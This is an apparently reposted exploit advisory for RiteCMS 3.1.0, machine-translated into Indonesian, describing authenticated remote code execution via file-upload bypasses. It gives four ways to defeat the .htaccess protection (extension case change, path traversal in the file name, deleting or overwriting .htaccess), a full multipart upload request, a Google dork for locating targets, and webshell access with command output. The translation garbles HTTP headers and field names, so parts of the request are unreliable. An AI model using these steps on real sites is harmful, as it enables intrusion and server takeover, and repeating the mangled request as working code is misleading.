RiteCMS 3.1.0 Unggah Shell / Eksekusi Kode Jarak Jauh

  • Whatsapp
Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Plugin
Sistem Manajemen Pasien Chikitsa Eksekusi Kode Jarak Jauh Plugin

News.nextcloud.asia

# Judul Eksploitasi: RiteCMS 3.1.0 – Eksekusi Kode Jarak Jauh (RCE) (Diotentikasi)
# Tanggal: 25/07/2021
# Eksploitasi Penulis: faisalfs10x (https://github.com/faisalfs10x)
# Beranda Vendor: https://ritecms.com/
# Tautan Perangkat Lunak: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Versi: <= 3.1.0
# Diuji pada: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:”Diberdayakan oleh RiteCMS”
# Referensi: https://Gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597

“””
################
# Keterangan #
################

# RiteCMS versi 3.1.0 dan di bawahnya mengalami eksekusi kode jarak jauh di panel admin. Penyerang yang diautentikasi dapat mengunggah file php dan melewati konfigurasi .htacess yang menolak eksekusi file .php di direktori media dan file secara default.
# Ada 4 cara untuk melewati perlindungan unggahan file saat ini untuk mencapai eksekusi kode jarak jauh.

# Metode 1: Hapus file .htaccess di direktori media dan file melalui modul pengelola file dan kemudian unggah file php – RCE tercapai

# Metode 2: Ganti nama ekstensi file .php menjadi .pHp atau apapun kecuali “.php”, misalnya shell.pHp dan unggah file shell.pHp – RCE tercapai

# Metode 3: Rantai dengan File Sewenang-wenang Timpa kerentanan dengan mengunggah file .php ke root web karena eksekusi .php diperbolehkan di root web – RCE tercapai
Secara default, penyerang hanya dapat mengunggah gambar di direktori media dan file saja – Kerentanan Penimpaan File Sewenang-wenang.
Cegat permintaan, ubah param file_name dan tempatkan payload ini “../webrootExec.php” untuk mengunggah file php ke root web

body= Content-Disposition: form-data; nama=”nama_file”
body= ../webrootExec.php

Jadi, webshell dapat diakses di web root melalui http://localhost/ritecms.v3.1.0/webrootExec.php

# Metode 4: Unggah .htaccess baru untuk menimpa yang lama dengan konten seperti di bawah ini untuk memungkinkan akses ke satu file php tertentu bernama “webshell.php” lalu unggah PHP webshell.php – RCE tercapai

$cat .htaccess


tolak dari semua


Izinkan dari semua

##############################################
# PoC untuk webshell menggunakan Metode 2 #
##############################################

Langkah-langkah untuk Reproduksi:

1. Masuk sebagai admin
2. Buka Manajer File
3. Pilih direktori untuk mengupload file .php baik media maupun direktori files.
4. Kemudian, klik Unggah file > Telusuri..
3. Unggah file .php dengan ekstensi pHp, misalnya webshell.pHp – untuk mem-bypass .htaccess
4. Webshell.pHp tersedia di http://localhost/ritecms.v3.1.0/media/webshell.pHp – jika Anda memilih direktori media, alihkan ke direktori file

Meminta:
========

POST /ritecms.v3.1.0/admin.php HTTP/1.1
Tuan rumah: localhost
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Terima: teks/html,aplikasi/xhtml+xml,aplikasi/xml;q=0.9,gambar/webp,*/*;q=0.8
Terima-Bahasa: en-US,en;q=0.5
Terima-Encoding: gzip, deflate
Content-Type: multipart/form-data; batas=—————————410923806710384479662671954309
Konten-Panjang: 1744
Asal: http://localhost
DNT: 1
Koneksi: tutup
Referensi: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs-Ambil Detik: asal yang sama
Pengguna Pengambilan Detik: ?1
Detik-GPC: 1

—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”modus”

manajer file
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”berkas”; nama file=”webshell.pHp”
Tipe-Konten: aplikasi/aliran oktet


—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”direktori”

media
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”nama_file”

—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”upload_mode”

1
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”resize_xy”

x
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama = “ubah ukuran”

640
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama = “kompresi”

80
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”thumbnail_resize_xy”

x
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”thumbnail_resize”

150
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”thumbnail_kompresi”

70
—————————– 410923806710384479662671954309
Isi-Disposisi: formulir-data; nama=”upload_file_kirim”

Oke – Unggah file
—————————–410923806710384479662671954309–

#########################
# Akses kulit web: #
#########################

# Akses kulit web melalui:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id

# Keluaran:
uid = 33 (www-data) gid = 33 (www-data) grup = 33 (www-data)

“””

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *